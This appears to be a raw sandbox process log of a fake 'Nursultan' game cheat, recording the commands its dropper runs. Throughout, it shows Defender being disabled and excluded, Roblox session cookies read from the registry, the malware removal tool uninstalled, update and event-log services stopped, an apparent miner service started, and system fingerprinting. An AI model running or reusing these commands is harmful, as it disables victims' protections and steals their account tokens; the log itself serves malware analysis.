"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

